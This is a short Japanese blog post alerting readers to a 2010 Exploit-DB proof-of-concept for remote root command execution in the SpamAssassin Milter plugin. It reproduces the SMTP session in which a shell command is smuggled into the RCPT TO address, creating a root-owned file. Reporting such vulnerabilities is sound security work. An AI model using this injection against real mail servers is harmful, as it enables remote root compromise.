http://www.exploit-db.com/exploits/11662(情報元のブックマーク数)
SpamassassinのMilterプラグインにリモートからrootコマンドを実行できるPoCが出ています。
# Title: Apache Spamassassin Milter Plugin Remote Root Command Execution
http://url4.eu/1k9Xm
# EDB-ID: 11662
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Kingcope
# Published: 2010-03-09
# Verified: yes
# Download Exploit Code
# Download N/A
ちょっ!!!!これヒドイぞ!
$ nc localhost 25 220 ownthabox ESMTP Postfix (Ubuntu) mail from: me@me.com 250 2.1.0 Ok rcpt to: root+:"|touch /tmp/foo" 250 2.1.5 Ok $ ls -la /tmp/foo -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
